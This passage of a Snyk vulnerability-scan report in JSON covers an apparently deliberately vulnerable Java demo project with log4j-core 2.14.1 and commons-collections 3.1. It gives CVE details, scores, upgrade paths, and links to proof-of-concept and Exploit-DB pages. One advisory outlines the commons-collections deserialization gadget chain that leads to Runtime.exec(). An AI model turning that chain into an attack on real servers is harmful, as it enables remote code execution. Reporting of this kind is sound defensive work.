- "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:58.516498Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.snyk:log4shell-client@0.0.1-SNAPSHOT", - "org.apache.logging.log4j:log4j-core@2.14.1" - ], - "upgradePath": [ - false, - "org.apache.logging.log4j:log4j-core@2.17.0" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.logging.log4j:log4j-core", - "version": "2.14.1" - }, - { - "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339", - "title": "Arbitrary Code Execution", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H/E:P", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.0-beta7,2.3.2)", - "[2.4,2.12.4)", - "[2.13.0,2.17.1)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.3.2", - "2.12.4", - "2.17.1" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 6.6, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.logging.log4j:log4j-core", - "references": [ - { - "url": "https://logging.apache.org/log4j/2.x/security.html", - "title": "Apache Security Page" - }, - { - "url": "https://github.com/apache/logging-log4j2/commit/05db5f9527254632b59aed2a1d78a32c5ab74f16", - "title": "GitHub Commit" - }, - { - "url": "https://issues.apache.org/jira/browse/LOG4J2-3293", - "title": "Jira Issue" - }, - { - "url": "https://www.openwall.com/lists/oss-security/2021/12/28/1", - "title": "Openwall Mail" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 6.6, - "modificationTime": "2024-03-11T09:48:51.766965Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 6.6, - "modificationTime": "2024-03-11T09:53:58.472982Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H/E:P", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 6.6, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:04:47.220633Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "medium", - "baseScore": 6.6, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:51.766965Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 6.6, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:58.472982Z" - } - ], - "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution.
**Note:** Even though this vulnerability appears to be related to the [log4Shell vulnerability](https://security.snyk.io/vuln/SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720), this vulnerability requires an attacker to have access to modify configurations to be exploitable, which is rarely possible.\r\n\r\nAn attacker with access to modification of logging configuration is able to configure `JDBCAppender` with a data source referencing a JNDI URI - which can execute malicious code.\r\n\r\nIn the fixed versions, `JDBCAppender` is using `JndiManager` and disables JNDI lookups by default (via `log4j2.enableJndiJdbc=false`).\r\n\r\n## Alternative Remediation\r\nIf you have reason to believe your application may be vulnerable and upgrading is not an option, you can either:\r\n\r\n* Disable/remove `JDBCAppender`\r\n* If `JDBCAppender` is used, make sure that it is not configured to use any protocol other than Java\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.2, 2.12.4, 2.17.1 or higher.\n## References\n- [Apache Security Page](https://logging.apache.org/log4j/2.x/security.html)\n- [GitHub Commit](https://github.com/apache/logging-log4j2/commit/05db5f9527254632b59aed2a1d78a32c5ab74f16)\n- [Jira Issue](https://issues.apache.org/jira/browse/LOG4J2-3293)\n- [Openwall Mail](https://www.openwall.com/lists/oss-security/2021/12/28/1)\n", - "epssDetails": { - "percentile": "0.89602", - "probability": "0.02239", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2021-44832" - ], - "CWE": [ - "CWE-94" - ] - }, - "packageName": "org.apache.logging.log4j:log4j-core", - "proprietary": false, - "creationTime": "2021-12-28T19:42:55.818691Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2021-12-28T19:42:53Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.logging.log4j", - "artifactId": "log4j-core" - }, - "publicationTime": "2021-12-28T20:17:52Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:58.472982Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.snyk:log4shell-client@0.0.1-SNAPSHOT", - "org.apache.logging.log4j:log4j-core@2.14.1" - ], - "upgradePath": [ - false, - "org.apache.logging.log4j:log4j-core@2.17.1" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.logging.log4j:log4j-core", - "version": "2.14.1" - } - ], - "ok": false, - "dependencyCount": 2, - "org": "austin.doll", - "policy": "# Snyk (https://snyk.io) policy file, patches or ignores known vulnerabilities.\nversion: v1.25.1\nignore: {}\npatch: {}\n", - "isPrivate": true, - "licensesPolicy": { - "severities": {}, - "orgLicenseRules": { - "AGPL-1.0": { - "licenseType": "AGPL-1.0", - "severity": "high", - "instructions": "" - }, - "AGPL-3.0": { - "licenseType": "AGPL-3.0", - "severity": "high", - "instructions": "" - }, - "Artistic-1.0": { - "licenseType": "Artistic-1.0", - "severity": "medium", - "instructions": "" - }, - "Artistic-2.0": { - "licenseType": "Artistic-2.0", - "severity": "medium", - "instructions": "" - }, - "CDDL-1.0": { - "licenseType": "CDDL-1.0", - "severity": "medium", - "instructions": "" - }, - "CPOL-1.02": { - "licenseType": "CPOL-1.02", - "severity": "high", - "instructions": "" - }, - "EPL-1.0": { - "licenseType": "EPL-1.0", - "severity": "medium", - "instructions": "" - }, - "GPL-2.0": { - "licenseType": "GPL-2.0", - "severity": "high", - "instructions": "" - }, - "GPL-3.0": { - "licenseType": "GPL-3.0", - "severity": "high", - "instructions": "" - }, - "LGPL-2.0": { - "licenseType": "LGPL-2.0", - "severity": "medium", - "instructions": "" - }, - "LGPL-3.0": { - "licenseType": "LGPL-3.0", - "severity": "medium", - "instructions": "" - }, - "MPL-1.1": { - "licenseType": "MPL-1.1", - "severity": "medium", - "instructions": "" - }, - "MPL-2.0": { - "licenseType": "MPL-2.0", - "severity": "medium", - "instructions": "" - }, - "MS-RL": { - "licenseType": "MS-RL", - "severity": "medium", - "instructions": "" - }, - "SimPL-2.0": { - "licenseType": "SimPL-2.0", - "severity": "high", - "instructions": "" - }, - "LGPL-2.1": { - "licenseType": "LGPL-2.1", - "severity": "medium", - "instructions": "" - } - } - }, - "packageManager": "maven", - "ignoreSettings": { - "adminOnly": false, - "reasonRequired": true, - "disregardFilesystemIgnores": false - }, - "summary": "4 vulnerable dependency paths", - "remediation": { - "unresolved": [], - "upgrade": { - "org.apache.logging.log4j:log4j-core@2.14.1": { - "upgradeTo": "org.apache.logging.log4j:log4j-core@2.17.1", - "upgrades": [ - "org.apache.logging.log4j:log4j-core@2.14.1", - "org.apache.logging.log4j:log4j-core@2.14.1", - "org.apache.logging.log4j:log4j-core@2.14.1", - "org.apache.logging.log4j:log4j-core@2.14.1" - ], - "vulns": [ - "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339", - "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2321524", - "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2320014", - "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720" - ] - } - }, - "patch": {}, - "ignore": {}, - "pin": {} - }, - "filesystemPolicy": false, - "filtered": { - "ignore": [], - "patch": [] - }, - "uniqueCount": 4, - "projectName": "io.snyk:log4shell-client", - "foundProjectCount": 7, - "displayTargetFile": "log4shell-goof/log4shell-client/pom.xml", - "hasUnknownVersions": false, - "path": "/Users/austindoll/Documents/GitHub/java-goof" - }, - { - "vulnerabilities": [ - { - "id": "SNYK-JAVA-COMMONSCOLLECTIONS-30078", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[3.0,3.2.2)" - ] - }, - "exploit": "High", - "fixedIn": [ - "3.2.2" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9.8, - "functions": [ - { - "version": [ - "[3,3.2.2)" - ], - "functionId": { - "filePath": "org/apache/commons/collections/functors/InvokerTransformer.java", - "className": "InvokerTransformer", - "functionName": "transform" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "commons-collections:commons-collections", - "references": [ - { - "url": "http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/", - "title": "FoxGloveSecurity Blog" - }, - { - "url": "https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611", - "title": "GitHub Commit" - }, - { - "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580", - "title": "Jira Issue" - }, - { - "url": "https://github.com/ianxtianxt/CVE-2015-7501", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:46:27.924934Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:52:38.421377Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:09:40.078866Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:27.924934Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:38.421377Z" - } - ], - "description": "## Overview\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to execute arbitrary Java code with the `InvokerTransformer` serializable collections . The `sun.reflect.annotation.AnnotationInvocationHandler#readObject` method invokes `#entrySet` and `#get` on a deserialized collection. If an attacker has to ability to send serialized data (JMX, RMI, EJB) to an application using the `common-collections` library, it is possible to combine the aforementioned methods to execute arbitrary code on the application.\r\n\r\n\r\n`org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4`. We recommend moving to the new artifact if possible.\n\n**NOTE:** \r\n\r\nThis vulnerability has also been identified as: [CVE-2015-4852](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-6056408)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n## References\n- [FoxGloveSecurity Blog](http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/)\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611)\n- [Jira Issue](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n- [PoC](https://github.com/ianxtianxt/CVE-2015-7501)\n", - "epssDetails": { - "percentile": "0.88407", - "probability": "0.01844", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2015-7501" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "commons-collections:commons-collections", - "proprietary": false, - "creationTime": "2016-12-25T16:51:56Z", - "functions_new": [ - { - "version": [ - "[3,3.2.2)" - ], - "functionId": { - "className": "org.apache.commons.collections.functors.InvokerTransformer", - "functionName": "transform" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2015-11-06T16:51:56Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "High", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "commons-collections", - "artifactId": "commons-collections" - }, - "publicationTime": "2015-11-06T16:51:56Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:52:38.421377Z", - "socialTrendAlert": false, - "severityWithCritical": "critical", - "from": [ - "io.snyk:log4shell-server@0.0.1-SNAPSHOT", - "commons-collections:commons-collections@3.1" - ], - "upgradePath": [ - false, - "commons-collections:commons-collections@3.2.2" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "commons-collections:commons-collections", - "version": "3.1" - }, - { - "id": "SNYK-JAVA-COMMONSCOLLECTIONS-472711", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:R", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,3.2.2)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "3.2.2" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.6, - "functions": [ - { - "version": [ - "[3.1, 3.22)", - "[,3.0-dev2)" - ], - "functionId": { - "filePath": "org/apache/commons/collections/functors/InvokerTransformer.java", - "className": "InvokerTransformer", - "functionName": "" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "commons-collections:commons-collections", - "references": [ - { - "url": "https://github.com/apache/commons-collections/commit/5ec476b0b756852db865b2e442180f091f8209ee", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/apache/commons-collections/pull/18", - "title": "GitHub PR" - }, - { - "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580", - "title": "Jira Ticket" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:52:35.761152Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:R", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.6, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:03:34.698666Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:35.761152Z" - } - ], - "description": "## Overview\n\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data.\nVersions of commons-collections prior to `3.2.2` do not prevent deserialization of the class `org.apache.commons.collections.functors.InvokerTransformer`. This could be leveraged by an attacker as a gadget within a vulnerable application which deserializes user input to execute arbitrary code. \r\n\r\nVersions of commons-collections from 3.2.2 onwards will throw an `UnsupportedOperationException` error when attempts are made to deserialize InvokerTransformer instances to prevent potential remote code execution exploits.\r\n\r\n*Note:* `org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4` we recommend moving to the new artifact if possible.\r\n\r\n## PoC \r\n\r\n```\r\n/*\r\n\tGadget chain:\r\n\t\tObjectInputStream.readObject()\r\n\t\t\tAnnotationInvocationHandler.readObject()\r\n\t\t\t\tMap(Proxy).entrySet()\r\n\t\t\t\t\tAnnotationInvocationHandler.invoke()\r\n\t\t\t\t\t\tLazyMap.get()\r\n\t\t\t\t\t\t\tChainedTransformer.transform()\r\n\t\t\t\t\t\t\t\tConstantTransformer.transform()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tClass.getMethod()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tRuntime.getRuntime()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tRuntime.exec()\r\n\tRequires:\r\n\t\tcommons-collections\r\n */\r\n```\n\n## Details\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\r\n\r\n \r\n\r\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\r\n\r\n \r\n\r\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\r\n\r\n \r\n\r\nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\r\n\r\n \r\n\r\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\r\n\r\n- Apache Blog\r\n\r\n \r\n\r\nThe vulnerability, also know as _Mad Gadget_\r\n\r\n> Mad Gadget is one of the most pernicious vulnerabilities we’ve seen. By merely existing on the Java classpath, seven “gadget” classes in Apache Commons Collections (versions 3.0, 3.1, 3.2, 3.2.1, and 4.0) make object deserialization for the entire JVM process Turing complete with an exec function. Since many business applications use object deserialization to send messages across the network, it would be like hiring a bank teller who was trained to hand over all the money in the vault if asked to do so politely, and then entrusting that teller with the key. The only thing that would keep a bank safe in such a circumstance is that most people wouldn’t consider asking such a question.\r\n\r\n- Google\n\n\n## Remediation\n\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n\n\n## References\n\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/5ec476b0b756852db865b2e442180f091f8209ee)\n\n- [GitHub PR](https://github.com/apache/commons-collections/pull/18)\n\n- [Jira Ticket](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n", - "epssDetails": { - "percentile": "0.82603", - "probability": "0.00880", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2015-6420" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-6hgm-866r-3cjv" - ] - }, - "packageName": "commons-collections:commons-collections", - "proprietary": false, - "creationTime": "2019-10-10T18:31:03.943542Z", - "functions_new": [ - { - "version": [ - "[3.1, 3.22)", - "[,3.0-dev2)" - ], - "functionId": { - "className": "org.apache.commons.collections.functors.InvokerTransformer", - "functionName": "" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-10-10T00:00:00Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "commons-collections", - "artifactId": "commons-collections" - }, - "publicationTime": "2020-02-24T00:00:00Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:52:35.761152Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.snyk:log4shell-server@0.0.1-SNAPSHOT", - "commons-collections:commons-collections@3.1" - ], - "upgradePath": [ - false, - "commons-collections:commons-collections@3.2.2" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "commons-collections:commons-collections", - "version": "3.1" - }, - { - "id": "SNYK-JAVA-COMMONSCOLLECTIONS-6056408", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[3.0,3.2.2)" - ] - }, - "exploit": "High", - "fixedIn": [ - "3.2.2" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9.8, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "commons-collections:commons-collections", - "references": [ - { - "url": "http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/", - "title": "FoxGloveSecurity Blog" - }, - { - "url": "https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611", - "title": "GitHub Commit" - }, - { - "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580", - "title": "Jira Issue" - }, - { - "url": "https://github.com/ianxtianxt/CVE-2015-7501", - "title": "PoC" - }, - { - "url": "https://www.exploit-db.com/exploits/46628", - "title": "Exploit DB" - }, - { - "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", - "title": "CISA - Known Exploited Vulnerabilities" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:54:13.273677Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:09:40.088365Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:54:13.273677Z" - } - ], - "description": "## Overview\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to execute arbitrary Java code with the `InvokerTransformer` serializable collections . The `sun.reflect.annotation.AnnotationInvocationHandler#readObject` method invokes `#entrySet` and `#get` on a deserialized collection. If an attacker has to ability to send serialized data (JMX, RMI, EJB) to an application using the `common-collections` library, it is possible to combine the aforementioned methods to execute arbitrary code on the application.\r\n\r\n`org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4`. We recommend moving to the new artifact if possible.\n\n**NOTE:** \r\n\r\nThis vulnerability has also been identified as: [CVE-2015-7501](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n## References\n- [FoxGloveSecurity Blog](http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/)\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611)\n- [Jira Issue](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n- [PoC](https://github.com/ianxtianxt/CVE-2015-7501)\n- [Exploit DB](https://www.exploit-db.com/exploits/46628)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n", - "epssDetails": { - "percentile": "0.99663", - "probability": "0.96725", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2015-4852" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "commons-collections:commons-collections", - "proprietary": false, - "creationTime": "2023-11-14T13:41:26.946764Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2015-11-06T16:51:56Z", - "exploitDetails": { - "sources": [ - "CISA", - "ExploitDB", - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "High", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Attacked", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "commons-collections", - "artifactId": "commons-collections" - }, - "publicationTime": "2015-11-06T16:51:56Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-06-03T08:53:26.834525Z", - "socialTrendAlert": false, - "severityWithCritical": "critical", - "from": [ - "io.snyk:log4shell-server@0.0.1-SNAPSHOT", - 